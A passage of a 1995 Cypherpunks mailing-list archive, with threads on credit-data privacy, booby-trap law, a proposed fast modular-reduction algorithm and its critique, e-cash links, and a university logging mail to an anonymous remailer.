appreciated. > >Cort. > How could crypto put lawyers out of business? People would still have disagreements; plans would still go wrong; cars would still crash. More important, transactions would still need to be structured to carry out the desires of the parties while minimizing risks. Good communications technology, including crypto, could make lawyering more efficient, but I suspect the savings would be minimal. Communications technology will no more put lawyers out of business than CASE put programmers out of business. Buford C. Terrell 1303 San Jacinto Street Professor of Law Houston, TX 77002 South Texas College of Law voice (713)646-1857 terrell at sam.neosoft.com fax (713)646-1766 From robl at on-ramp.ior.com Wed Sep 6 16:31:35 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 16:31:35 PDT Subject: Flame: Re: Collection of personal info In-Reply-To: <9509062238.AA06272@cs.umass.edu> Message-ID: > Some close friends of mine have been raped, and I get the overwhelming > impression from them that rape has about as much in common with the sale of > financial databases as it does with Rice-a-Roni. Find a better analogy, or > you'll sound about as credible as those who insist the Internet teems with > pedophilic bombers who push dope outside preschools. Sorry if my choice of words offended you.. the intent was to express the feeling of being violated without consent. Perhaps I should have used the term violated or some other less violent term. The point being, I did not give permission for my records to be distributed, nor did I see a disclaimer on my credit cards that states that the transactions I make will be sold off to mailing houses in order to target me for additional sales. RobL From robl at on-ramp.ior.com Wed Sep 6 16:37:53 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 16:37:53 PDT Subject: Collection of personal info In-Reply-To: Message-ID: > Rob, I have entered this posting of yours into the "BlackNet Dossier > Service" I operate. At least you notified me.. :) Something the TRW crew or others like them do not do. > If someone doesn't want their postings going into my 220 megabyte file of > postings, they shouldn't send them to me. Or they should adopt a digital > pseudonym, unlinkable to their True Name or any other nyms they may have. This is true.. I could adopt a nym, such as I use on my BBS, or when I am doing other stuff on the net.. but it is difficult at best to get a new set of credit cards, ID and so on with a new name/alias and still maintain your own name. If it were possible to have an alias in real life, as easy as it is to get one on the 'net that is, then I would most certainly do so.. 'Frothmonger' From unicorn at polaris.mindport.net Wed Sep 6 16:52:17 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 6 Sep 95 16:52:17 PDT Subject: Collection of personal info In-Reply-To: Message-ID: On Wed, 6 Sep 1995, Rob Lowry wrote: > > Rob, I have entered this posting of yours into the "BlackNet Dossier > > Service" I operate. > > At least you notified me.. :) Something the TRW crew or others like them > do not do. > > > > If someone doesn't want their postings going into my 220 megabyte file of > > postings, they shouldn't send them to me. Or they should adopt a digital > > pseudonym, unlinkable to their True Name or any other nyms they may have. > > This is true.. I could adopt a nym, such as I use on my BBS, or when I am > doing other stuff on the net.. but it is difficult at best to get a new > set of credit cards, ID and so on with a new name/alias and still > maintain your own name. In fact it's not difficult. It's quite simple to estlablish new identity for the individual willing to risk the charges and consequences of exposure. The basic impediment is time. Good credit doesn't come overnight. The second impediment is tax evasion- which is less than justifiable in the United States on the grounds of privacy. If you're willing to be patient, and pay taxes on more than one name, its easy to maintain several identities. > If it were possible to have an alias in real > life, as easy as it is to get one on the 'net that is, then I would most > certainly do so.. Which tells me how serious you really are about your privacy. You have made a decision here about how much trouble privacy is worth to you, which is "not much." I hear people bitch about privacy endlessly. Privacy helps those who help themselves to privacy. I think Mr. May was precisely correct in saying that it is so much easier and simpler for one to rely on self privacy insurance rather than government privacy insurance. > 'Frothmonger' From tcmay at got.net Wed Sep 6 16:57:45 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 16:57:45 PDT Subject: Collection of personal info Message-ID: At 11:37 PM 9/6/95, Rob Lowry wrote: >> Rob, I have entered this posting of yours into the "BlackNet Dossier >> Service" I operate. > >At least you notified me.. :) Something the TRW crew or others like them >do not do. If you mean that TRW Credit does not inform you every time a transaction is entered into their files, this is true. Be grateful they don't. If you mean the existence of the record itself has not been reported to you, it has hardly been a secret. It has been very well-known for many years that these records exist, and you can subscribe to a service that reports to you regularly about your credit record. (No, it is not "free," but why should it be? It costs them money to send this stuff to you, and they see it as a valid business market, as do I. At least the cost is fairly nominal.) Again, you are free to use cash, to use a bank card which protects your privacy, and so forth. ... >This is true.. I could adopt a nym, such as I use on my BBS, or when I am >doing other stuff on the net.. but it is difficult at best to get a new >set of credit cards, ID and so on with a new name/alias and still >maintain your own name. If it were possible to have an alias in real >life, as easy as it is to get one on the 'net that is, then I would most >certainly do so.. I was not saying such nums are easy to use in the real world (though friends of mine have VISA cards in fictitious names, and the cards are fully functional, and are not just "second names" on their main card). What I am saying is that we should be very careful not to lobby for laws which will make the surveillance state _more_ invasive, and more insinuated into every aspect of our lives. Be concerned about the dossier society, just don't look to "the government" to protect you. Not only will they continue to keep their own dossiers (*), they'll use such "Data Privacy" laws to invade the privacy of others. (* I've got a long section in my Cyphernomicon on the ties between the Big Three of credit reporting agencies, the FinCEN and similar folks, the intelligence agnencies, and Witness Protection folks who give out those wonderful new identities. You think the Big Three don't know immediately who the 50,000+ people in Witness Protection (aka Witness Security) are? This may sound like something from the "Vince Foster and Danny Casolaro conspiracy tapes," but it has some direct links to Cypherpunks issues: the Feds have the power now to create new identities, falsify past financial records, and run the scams that these methods imply...and the Big Three are all headquartered within a few miles of the relevant agencies, in Vienna, Langley, MacLean, Tyson's Corner, Herndon, Chantilly, Reston, and suchlike spook haunts in No. Virginia.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From robl at on-ramp.ior.com Wed Sep 6 17:08:05 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 17:08:05 PDT Subject: Collection of personal info In-Reply-To: Message-ID: > Which tells me how serious you really are about your privacy. You have > made a decision here about how much trouble privacy is worth to you, > which is "not much." If I were single, it would be a lot easier to just start making up names and living under assumed aliases.. but with a wife and two kids, I have to follow the rules a bit more.. My privacy is worth variable amounts depending on who has access to it.. I certainly do not care if anyone on this list knows who I am or not, as it is something I voluntarily chose to join. Selling info about me, without notifying me before hand is another situation altogether. Even the magazines I subscribe to have notices that my name may be sold.. and the mags that don't have such a warning, but sell my name anyways, get cancelled as soon as I discover it. Far easier to stop by the local PC store and buy it a week later than to have mounds of junk mail piling up. > I hear people bitch about privacy endlessly. Privacy helps those who > help themselves to privacy. I think Mr. May was precisely correct in saying > that it is so much easier and simpler for one to rely on self privacy > insurance rather than government privacy insurance. Again, you both are correct, and perhaps I was overstating my position in regards to the TRW/etc. groups.. I have a tendancy to do so. Each of us has the responsibility to monitor the activities in our lives, both directly and indirectly. Whether this is watching our spending to make sure we do no overcharge, or encrypting mail to keep in secure, we need to be aware of what we are doing, and the reactions of others as a result of our actions. In this case, the action is spending money on credit, and the reaction is being monitored by credit agencies. My solution was to get rid of all the credit cards 4 years ago.. my credit history is trashed in part do to very low activity over the last 4 years, and of course, the side effect of maxing out 4 cards. -stepping off soapbox and looking for the next topic..- From wilcoxb at nag.cs.colorado.edu Wed Sep 6 17:20:55 1995 From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox) Date: Wed, 6 Sep 95 17:20:55 PDT Subject: Are booby-trapped computers legal? In-Reply-To: <9509061938.AA02249@zorch.w3.org> Message-ID: <199509070020.SAA01751@nag.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- > There is no self defense argument where the purpose is not to prevent > physical harm. If this were a political philosophy list I would state that self-defense justification often extends to property (As I believe it should). Since this is a cryptography-and-social-changes-thereof list I will refrain... > People who go round drawing parallels to gun ownership and cryptography > ownership are simply playing into the governments hands. No! Stop! Don't say it! PLEASE go post this message to alt.security, talk.politics.guns and alt.fan.david-sternlight and keep it away from this list... Bryce (toss in alt.flame while you are at it...) signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQCVAwUBME46vvWZSllhfG25AQEX9QP9HpngGnwA1rSEo7knTJ8RalpK9HbZm0u/ SkO6blQCV8kqcYxN5uZTFefCQPjTakEaUv8YnWpHNGOfFIu8igNOGMTCTV6ptVEy rYKqupcycYXugN7XGdgQH2UNCUO2M59FpBC65nm4FB05ZUrwYyz0weeCkmxDTZHP 1FKRnjXpWrU= =b3yP -----END PGP SIGNATURE----- From weidai at eskimo.com Wed Sep 6 17:48:44 1995 From: weidai at eskimo.com (Wei Dai) Date: Wed, 6 Sep 95 17:48:44 PDT Subject: fast modular reduction Message-ID: During the Crypto' 95 Rump Session, Josh Benaloh of Microsoft Corp. presented a new modular reduction algorithm that he and I developed. It is faster than the Montgomery method by about 10 to 15%, and is more general and easier to understand. The central idea is that it is easy to reduce a number to an equivalent one that's just one "block" (machine word) longer than the modulus, by repeatedly subtracting off the highest block, and adding back something that's equivalent, but smaller. In the following pseudocode, B is the radix in which the numbers are represented (2^32 for a 32-bit machine), n is the length of modulus in blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 is the length of X, and Y is the result. 1. Y = X 2. For i from k down to n+1, repeat steps 3 and 4 3. Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1) 4. If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1) Tricks can be used to eliminate step 4, and to reduce Y to n blocks using one single precision division, and n more single precision multiplications. The algorithm will hopefully be written up more completely soon. Wei Dai From mnorton at cavern.uark.edu Wed Sep 6 17:52:56 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 6 Sep 95 17:52:56 PDT Subject: Are booby-trapped computers legal? In-Reply-To: Message-ID: If the jury isn't persuaded betond reasonable doubt that you were in genuine apprehension of serious harm to yourself or your family--not your property--then you will be acquitted of using violence to repel an intruder into your home. Maybe not your south 40, but your home. Indeed, if the local prosecutor or US Atty believes, on the positive side, that your actions were reasonable, you probably won't even be charged. Now, that doesn't of itself make deadly force right, but as I'm just through with cleaning two shotguns (dove season here, going again Friday), I'm not going to argue the point too vigorously. I'd say the morality of such situations, leaving aside the legality, is extremely fact-intensive. Situational ethics? Excessive subjectivity? I think not--I think we can apply objective standards to each individual case, but it's fatuous to do so in advance. MacN On Tue, 5 Sep 1995, Timothy C. May wrote: > >I don't know what you call it but if nothing else it is ethicaly and moraly > >reprehinsible. > > Different strokes for different folks. Anyone entering my house unannounced > faces lethal response. I think of it as evolution in action, and doubt I > would lose any sleep over this. > > It has nothing to do with equating human life over property, it has to do > with defending one's property and (maybe) one's life. Here in California, > it is becoming more and more common for "home invasions" to be followed by > execution of all of the witnesses. (Read "The San Jose Mercury News" for > accounts of gang invasions in which all the residents in a home are lined > up and shot, excecution-style.) > > I won't get into a discussion of which states permit lethal force > responses, as this is a topic which even I think belongs in > talk.politics.guns or similar fora. > > Suffice it to say that most states allow lethal response under threatening > circumstances. > > --Tim May > > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > > > From ravage at einstein.ssz.com Wed Sep 6 18:10:56 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Wed, 6 Sep 95 18:10:56 PDT Subject: e$ sites of interest Message-ID: <199509070116.UAA00143@einstein.ssz.com> Hi all, Found these in PC Week and thought I would pass them along... CARI - http://www. netresource.com/itp/cari.html Collect All Relevant Information, a transaction system that doesn't require live transmission of sensitive data. Cybercash Inc. - http://www.cybercash.com/ Secure transaction over the internet, using credit and cash payment systems. Digicash - http://www.digicash.com/ Electronic transaction products include ecash; find the links to ecash-centric 'cybershops'. First Virtual - http://www.fv.com/ Secure internet-based system that uses the WWW and email for digital payment transactions. Internet Banking - http://sfnb.com/wpaper.html White paper on electronic commerce NetChex - http://www.netchex.com/index.html Secure transactions over the internet, using a bank account debit system. Network Payment Mechanisms and Digital Cash - http://ganges.cs.tcd.ie/ mepeirce/project.html Overview of trands and techniques, with several useful links for additional information. From mnorton at cavern.uark.edu Wed Sep 6 18:11:26 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 6 Sep 95 18:11:26 PDT Subject: Are booby-trapped... [Detailed treatment] In-Reply-To: Message-ID: Thing about the Restatement (any of 'em) is that they must be read carefully, being especially wary of circularity. Note here that the actor would be privileged only to the extent he would be privileged, get it? under some other body of law not specifically referenced. So it all comes back to reasonable apprehension of bodily harm to yourself or your family (or guests, I suppose), in your home or similar place. MacN On Wed, 6 Sep 1995, Black Unicorn wrote: > > The basic rule today in most states resembles the restatement position: > > Section 85. Use of Mechanical Device Threatening Death or Serious > Bodily Injury. > > The actor is so far privileged to use such a device intended or likely > to cause serious bodily harm or death for the purpose of protecting his > land or chattels from intrusion that he is not liable for the serious > bodily harm or death thereby caused to an intruder whose intrusion is, > in fact, such that the actor, were he present, would be privileged to > prevent or terminate it by the intentional infliction of such harm. > [big snip of excellent research] From tcmay at got.net Wed Sep 6 18:18:52 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 18:18:52 PDT Subject: Collection of personal info Message-ID: At 12:07 AM 9/7/95, Rob Lowry wrote: >Again, you both are correct, and perhaps I was overstating my position in >regards to the TRW/etc. groups.. I have a tendancy to do so. Each of us >has the responsibility to monitor the activities in our lives, both ... You mentioned you're a newcomer to the list, so all is forgiven. Seriously, what you'll notice is that people (like me) will respond to arguments made, and, for obvious reasons, concentrate on the points of difference rather than the points of agreement. So, keep posting! --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cman at communities.com Wed Sep 6 18:27:08 1995 From: cman at communities.com (Douglas Barnes) Date: Wed, 6 Sep 95 18:27:08 PDT Subject: fast modular reduction Message-ID: I was very distressed when Josh gave this presentation; apparently patents have been filed, etc., and someone from another company in Europe was claiming they'd _already_ patented it. What is the story here? From my pov, the performance increase doesn't justify the ramifications of dealing with yet another potentially surly patent holder (either Microsoft in your case, or whoever the irate European fellow was who claims to have already patented it.) From kensington at earthlink.net Wed Sep 6 18:31:17 1995 From: kensington at earthlink.net (Steven Calabro) Date: Wed, 6 Sep 95 18:31:17 PDT Subject: Symbols on the net :) Message-ID: <42ijlr$rff@mars.earthlink.net> If you know of any symbols or acronyms used on the net, please mail them to me. Thanks From mnorton at cavern.uark.edu Wed Sep 6 18:50:03 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 6 Sep 95 18:50:03 PDT Subject: Collection of personal info In-Reply-To: Message-ID: Tim and I have corresponded about this previously, and again he neglects the distinction between collection and storage, on the one hand, and retrival and dissemination, on the other. If you do the latter, your content better be accurate. That's the difference in Tim and TRW. So far.:) MacN On Wed, 6 Sep 1995, Rob Lowry wrote: > > Rob, I have entered this posting of yours into the "BlackNet Dossier > > Service" I operate. > > At least you notified me.. :) Something the TRW crew or others like them > do not do. > > > > If someone doesn't want their postings going into my 220 megabyte file of > > postings, they shouldn't send them to me. Or they should adopt a digital > > pseudonym, unlinkable to their True Name or any other nyms they may have. > > This is true.. I could adopt a nym, such as I use on my BBS, or when I am > doing other stuff on the net.. but it is difficult at best to get a new > set of credit cards, ID and so on with a new name/alias and still > maintain your own name. If it were possible to have an alias in real > life, as easy as it is to get one on the 'net that is, then I would most > certainly do so.. > > 'Frothmonger' > > From dsc at swcp.com Wed Sep 6 18:50:35 1995 From: dsc at swcp.com (Dar Scott) Date: Wed, 6 Sep 95 18:50:35 PDT Subject: e$ sites of interest Message-ID: Jim Choate wrote, >Found these in PC Week and thought I would pass them along... For me, new to this, I found NetBank's Netcash(tm) to be the most interesting even with its little built-in protection from those who spend money twice. NetBank's URL is this: http://www.teleport.com/~netcash/ It is listed with many others in >Network Payment Mechanisms and Digital Cash - http://ganges.cs.tcd.ie/ > mepeirce/project.html > > Overview of trands and techniques, with several useful links for > additional information. Dar (list newbie) =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From mfroomki at umiami.ir.miami.edu Wed Sep 6 18:56:28 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Wed, 6 Sep 95 18:56:28 PDT Subject: Collection of personal info In-Reply-To: Message-ID: As it happens I seem to be about to write about this stuff. Pointers to articles/data especially about distributed data sets and how people may link them up, would be very welcome... A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki From rjc at clark.net Wed Sep 6 18:58:17 1995 From: rjc at clark.net (Ray Cromwell) Date: Wed, 6 Sep 95 18:58:17 PDT Subject: fast modular reduction In-Reply-To: Message-ID: <199509070157.VAA16973@clark.net> > > In the following pseudocode, B is the radix in which the numbers are > represented (2^32 for a 32-bit machine), n is the length of modulus in > blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 > is the length of X, and Y is the result. > > 1. Y = X > 2. For i from k down to n+1, repeat steps 3 and 4 > 3. Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1) > 4. If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1) Is there a proof of correctness available for this algorithm? It looks almost like a Radix-B peasant division algorithm with some modifications. Is there an algorithmic analysis available? I also I think there is a bug in your description. Let k+1 = n+1 (e.g. the dividend is 1 more "block" than the modulus). Then i=n starting out, and we have 3. Y=Y - Y[n] * B^n + Y[n] * U * B^(n-n-1) [we have B^-1] I'm assuming this was unintended. How does this algorithm compare to computing the reciprocal via Newton's Formula, and then multiplying by the reciprocal using Karatsuba multiplication? While I was at IBM Watson I invented a modular reduction algorithm that saves 1/4 the number of multiplications required on average once you have the reciprocal computed. -Ray From rjc at clark.net Wed Sep 6 19:05:44 1995 From: rjc at clark.net (Ray Cromwell) Date: Wed, 6 Sep 95 19:05:44 PDT Subject: fast modular reduction In-Reply-To: Message-ID: <199509070205.WAA18771@clark.net> > > > I was very distressed when Josh gave this presentation; apparently > patents have been filed, etc., and someone from another company > in Europe was claiming they'd _already_ patented it. > > What is the story here? From my pov, the performance increase doesn't > justify the ramifications of dealing with yet another potentially > surly patent holder (either Microsoft in your case, or whoever the > irate European fellow was who claims to have already patented it.) I wish the damn patent offices of the world would get a clue. It used to be when someone found a quicker algorithm, it was published in a journal and sooner or later showed up in Knuth AoCP version x.y. Now, every single algorithm gets patented. At the rate its going now, "ComponentWare" of the future will mean the number of patent components you managed to license simultaneously. The worst patent being considered by the Patent Office right now is the dreaded Eolas patent which purports to have invented the concept of "embedded applications" in Web documents (e.g. Grail, Java, Safe-Tcl) and interprocess communication between web browsers and helper applications (e.g. NS-API/NC-API) The whole patent system needs to be abolished. -Ray From tcmay at got.net Wed Sep 6 19:11:12 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 19:11:12 PDT Subject: Collection of personal info Message-ID: At 1:49 AM 9/7/95, Mac Norton wrote: >Tim and I have corresponded about this previously, >and again he neglects the distinction between >collection and storage, on the one hand, and >retrival and dissemination, on the other. If you >do the latter, your content better be accurate. > >That's the difference in Tim and TRW. So far.:) I don't really disagree with Mac, at least practically speaking. (At a much deeper level, much deeper in terms of philosophy, I'm not even sure _disseminators_ of information have any real necessity to be correct. This is the issue of truth, reputation, etc. that we discuss so often. But, I admit that the legal system does not support my anarcho-capitalist extreme position, which is why I say I don't disagree with Mac, "practically speaking.") However, even if I were to start distributing the results of "Tim's BlackNet Dossier Service," I don't think there's any justification for people insisting that they have a right to "inspect" my records. I think the current U.S. law is not too far from my own views. The credit reporting agencies have an obvious interest in having accurate information--except for the folks in the Witness program--and will eventually correct errors. (Not everyone is happy with the speed, but this is life in a world of finite resources; and I acknowledge that there are pathological cases of incorrect identity, etc.) I still favor free market alternatives to top-down government "protection." And, lest anyone think I'm lapsing in my basic beliefs, I lean toward throwing out _all_ laws about libel, slander, and false information. After all, "what is truth?," to coin a phrase. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From mnorton at cavern.uark.edu Wed Sep 6 19:20:50 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 6 Sep 95 19:20:50 PDT Subject: Collection of personal info In-Reply-To: Message-ID: On Wed, 6 Sep 1995, Timothy C. May wrote: > I don't really disagree with Mac, at least practically speaking. > > (At a much deeper level, much deeper in terms of philosophy, I'm not even > sure _disseminators_ of information have any real necessity to be correct. > This is the issue of truth, reputation, etc. that we discuss so often. But, > I admit that the legal system does not support my anarcho-capitalist > extreme position, which is why I say I don't disagree with Mac, > "practically speaking.") Well, scratch me deeply enough, I'm not sure I'd disagree with Tim, "philosophically speaking." The problem is, as all the truly wise philosophers recognized, we must live in the world. And given the number of us who must do so, that entails rules. With that caveat, none of the below is insufferable to me. MacN > However, even if I were to start distributing the results of "Tim's > BlackNet Dossier Service," I don't think there's any justification for > people insisting that they have a right to "inspect" my records. > > I think the current U.S. law is not too far from my own views. The credit > reporting agencies have an obvious interest in having accurate > information--except for the folks in the Witness program--and will > eventually correct errors. (Not everyone is happy with the speed, but this > is life in a world of finite resources; and I acknowledge that there are > pathological cases of incorrect identity, etc.) > > I still favor free market alternatives to top-down government "protection." > > And, lest anyone think I'm lapsing in my basic beliefs, I lean toward > throwing out _all_ laws about libel, slander, and false information. After > all, "what is truth?," to coin a phrase. > > --Tim May > > > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > > > From ravage at einstein.ssz.com Wed Sep 6 19:21:55 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Wed, 6 Sep 95 19:21:55 PDT Subject: Collection of personal info In-Reply-To: Message-ID: <199509070227.VAA00478@einstein.ssz.com> > > And, lest anyone think I'm lapsing in my basic beliefs, I lean toward > throwing out _all_ laws about libel, slander, and false information. After > all, "what is truth?," to coin a phrase. > > --Tim May > Truth is that which can be verified to be reproducable by indipendant and unbiased parties. All else is opinion. From jsimmons at goblin.punk.net Wed Sep 6 19:32:32 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Wed, 6 Sep 95 19:32:32 PDT Subject: University logging mail to anon.penet Message-ID: <199509070230.TAA24609@goblin.punk.net> This just came up locally, and I'd like to have some comments on it, especially from people who understand the law a lot better than I do: Our local University apparently has been logging ALL mail to anon.penet, including faculty, students, and off-campus users. They maintain such weak security that someone was able to "obtain" the logs and post them to a local usenet group, thus compromising everyone's "anonymous" identities. -- Jeff Simmons jsimmons at goblin.punk.net From damion.furi at the-matrix.com Wed Sep 6 19:52:01 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Wed, 6 Sep 95 19:52:01 PDT Subject: Collection of persona In-Reply-To: <8B09393.000504D43B.uuout@the-matrix.com> Message-ID: <8B094FC.000504D58B.uuout@the-matrix.com> RL|Beyond having the willies.. This is more than just scary, it feels like |rape when you think about it for awhile. Everything you buy, on credit, is |recorded and sold to someone who wants to know your secrets. Everytime |you make a banking transaction, someone is watching and compiling the |data. It's not just credit anymore. If you buy something at Radio Shack, even with cash, they want you to give all your info voluntarily and they _will_ give you flack if you don't cooperate (which can be short-circuited by threatening to cause a scene or by suggesting loudly that has lower prices). Anyway, most of what you're wanting to protect aren't secrets, at least in the sense of being sensitive material. It's our privacy, our solitude, and our peace of mind that's under attack. RL|Is there any legal recourse to get your name removed from the sellable list? |Or is it too late and we can not save even the vestiges of our privacy? There's a place in D.C. you can write to that will put a block on some lists, but not all (I don't have the address anymore). We're screwed. RL|Oh, but if only I had the 'hacker' skill to break into such a database.. |I have always been against the destruction of data.. but there are |exceptions... It wouldn't help and you would be jailed for nothing. :----------:----------:----------:----------:----------:----------:----- : furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94 PGP: When it's none of their damned business. -- SPEED 1.40 [NR]: Evaluation day 133... From gimonca at mirage.skypoint.com Wed Sep 6 20:01:08 1995 From: gimonca at mirage.skypoint.com (Charles Gimon) Date: Wed, 6 Sep 95 20:01:08 PDT Subject: University logging mail to anon.penet (fwd) Message-ID: Forwarded message: > From toad.com!owner-cypherpunks Wed Sep 6 21:43:41 1995 > From: Jeff Simmons > Subject: University logging mail to anon.penet > > This just came up locally, and I'd like to have some comments on it, > especially from people who understand the law a lot better than I do: > > Our local University apparently has been logging ALL mail to anon.penet, > including faculty, students, and off-campus users. > > They maintain such weak security that someone was able to "obtain" > the logs and post them to a local usenet group, thus compromising > everyone's "anonymous" identities. > punk.net is in San Luis Obispo. Since Skypoint carries a lot of regional groups, I can follow the issue on Usenet, in these groups: slo.unix,slo.general,slo.punks,alt.comp.acad-freedom.talk,comp .org.eff.talk Those of you who don't get the slo.* groups, you can probably see the original posts in comp.org.eff.talk or alt.comp.acad-freedom. The subject is "No subject". (I still chuckle when I see the group slo.sex ...) From rrothenb at ic.sunysb.edu Wed Sep 6 20:04:38 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 6 Sep 95 20:04:38 PDT Subject: Collection of personal information etc. etc. etc. In-Reply-To: <8B094FC.000504D58B.uuout@the-matrix.com> Message-ID: <199509070305.XAA18310@libws4.ic.sunysb.edu> > It's not just credit anymore. If you buy something at Radio > Shack, even with cash, they want you to give all your info > voluntarily and they _will_ give you flack if you don't > cooperate (which can be short-circuited by threatening to cause > a scene or by suggesting loudly that has lower > prices). Depends on the counter people. The local RS here the clerks don't care much about it and will enter a random number. A local Service Merchandise does the same thing, but they're pesky, so I make up silly names to test the wits of impatient teenage mutant cashiers. (They also used to have a computer where you enter your telno. and place orders to pick up at the desk... I don't think the system bills you automatically but the employees probably won't like it when you have them get 10 wieght sets out...) From rrothenb at ic.sunysb.edu Wed Sep 6 20:05:35 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 6 Sep 95 20:05:35 PDT Subject: University logging mail to anon.penet In-Reply-To: <199509070230.TAA24609@goblin.punk.net> Message-ID: <199509070306.XAA18362@libws4.ic.sunysb.edu> So which university is this? > This just came up locally, and I'd like to have some comments on it, > especially from people who understand the law a lot better than I do: > > Our local University apparently has been logging ALL mail to anon.penet, > including faculty, students, and off-campus users. > > They maintain such weak security that someone was able to "obtain" > the logs and post them to a local usenet group, thus compromising > everyone's "anonymous" identities. > > -- > Jeff Simmons jsimmons at goblin.punk.net > From jsimmons at goblin.punk.net Wed Sep 6 20:29:03 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Wed, 6 Sep 95 20:29:03 PDT Subject: University logging mail to anon.penet In-Reply-To: <199509070306.XAA18362@libws4.ic.sunysb.edu> Message-ID: <199509070326.UAA24732@goblin.punk.net> > > > So which university is this? > > > This just came up locally, and I'd like to have some comments on it, > > especially from people who understand the law a lot better than I do: > > > > Our local University apparently has been logging ALL mail to anon.penet, > > including faculty, students, and off-campus users. > > > > They maintain such weak security that someone was able to "obtain" > > the logs and post them to a local usenet group, thus compromising > > everyone's "anonymous" identities. > > California State Polytechnic University, San Luis Obispo -- Jeff Simmons jsimmons at goblin.punk.net From mnorton at cavern.uark.edu Wed Sep 6 20:33:36 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 6 Sep 95 20:33:36 PDT Subject: Collection of personal info In-Reply-To: <199509070227.VAA00478@einstein.ssz.com> Message-ID: Doesn't make it true, in Tim's sense--just makes it verifiable. MacN On Wed, 6 Sep 1995, Jim Choate wrote: > Truth is that which can be verified to be reproducable by indipendant and > unbiased parties. All else is opinion. From dneal at usis.com Wed Sep 6 20:35:35 1995 From: dneal at usis.com (David Neal) Date: Wed, 6 Sep 95 20:35:35 PDT Subject: Collection of personal info In-Reply-To: Message-ID: On Wed, 6 Sep 1995, Timothy C. May wrote: > At 10:15 PM 9/6/95, Rob Lowry wrote: > > >Beyond having the willies.. This is more than just scary, it feels like > >rape when you think about it for awhile. Everything you buy, on credit, is > >recorded and sold to someone who wants to know your secrets. Everytime > >you make a banking transaction, someone is watching and compiling the > >data. > > > > If someone doesn't want their postings going into my 220 megabyte file of > postings, they shouldn't send them to me. Or they should adopt a digital > pseudonym, unlinkable to their True Name or any other nyms they may have. > > Things are much simpler and less stressful when you don't look to the law > to fix things. > Nor was I suggesting a legal solution (I know your comment was triggered by Rob's request for legal recourse) but instead suggesting that things are farther along than some people realize. Someone suggested a rational, non-hysterical approach to converting people. Perhaps. I certainly wrote a nice letter to the editor of a magazine which published a piece about electronic checking, and made sure to mention that e-cash would be preferable to some. On the other hand, The Gub'mint is certainly conducting a campaign overt and covert to throttle unlimited and uncontrolled use of cryptography. That combined with how politicized things are these days, it can be difficult to conduct a rational debate or in fact find anyone who wants to talk. Personally, I'm of 